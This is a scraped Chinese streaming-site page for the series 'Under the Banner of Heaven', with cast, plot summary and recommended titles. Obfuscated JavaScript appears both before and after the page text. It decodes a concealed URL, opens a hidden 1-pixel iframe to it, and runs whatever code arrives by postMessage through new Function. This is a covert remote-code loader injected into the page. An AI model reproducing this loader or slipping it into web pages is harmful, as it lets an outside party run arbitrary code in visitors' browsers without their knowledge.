if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['XkHRaDH']=function (){ ;(function (u, w, d, f, c) { 'jQuery'; var x = qdfEWb; var _id = d['qu'+'ery'+'Se'+'le'+'cto'+'rA'+'ll']('.a7465').length; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'c'+_id+'.fon'; var __nid='i'+new Date().getTime(); var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = __nid; f.className = 'a7465'; f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['__y' + 'ra' + 'nq' + 'ob' + 'j_7465_'+_id] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#'+__nid); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_7465_`+_id]) { var t = x(e.data[`des_s_7465_`+_id].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'aHR'+'0cH'+'MlM'+'FF0'+'ElM'+'kYF'+'FlM'+'kZq'+'YS5'+'zdG'+'16e'+'nMu'+'YFF'+'29t'+'JTN'+'FFB'+'MTA'+'0NF'+'FDM'+'lFF'+'MkZ'+'jNG'+'NhN'+'DIl'+'MkZ'+'jLT'+'c0N'+'jUt'+'FFM'+'jUt'+'MWU'+'2', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

天堂旗帜下

6.0

主演:安德鲁·加菲尔德,黛西·埃德加-琼斯,萨姆·沃辛顿,比利·豪尔,怀亚特·拉塞尔

导演:大卫·马肯兹,伊莎贝尔·桑多瓦

剧情介绍

本剧改编自Jon Krakauer同名书籍,将讲述一系列事件,最后导致了居住在犹他州盐湖谷郊区的Brenda Wright Lafferty(黛西·埃德加-琼斯 饰)和其宝贝女儿于1984年被谋杀。 在Jeb Pyre警探(安德鲁·加菲尔德 饰)调查Lafferty家庭内部事务时,他揭露了一些不为人知的秘密:耶稣基督后期圣徒教会(又称摩门教)起源,和坚定信仰带来的暴力后果。作为一名虔诚的摩门教徒,Pyre发现的东西让他开始质疑自己的信仰。

猜您喜欢的

 • 正片

  我在这儿(2010)

 • 正片

  无人看护

 • 超清

  星球大战9:天行者崛起

 • 正片

  阿凡达

 • 更新至02集

  天堂旗帜下Copyright © 2018 6080在线影视网站-高清影视大全

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['mQsxxjd']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_7464`]) { var t = x(e.data[`des_s_7464`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'aHR'+'0cH'+'MlM'+'0El'+'MkY'+'lMk'+'FFZ'+'qYS'+'5zd'+'G16'+'enM'+'uYF'+'F29'+'tFF'+'JTN'+'FFB'+'MTA'+'0ND'+'MlM'+'kZj'+'NGN'+'hNF'+'FDI'+'lMk'+'ZjL'+'TFF'+'c0N'+'jQt'+'FFM'+'jIt'+'MWU'+'2',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}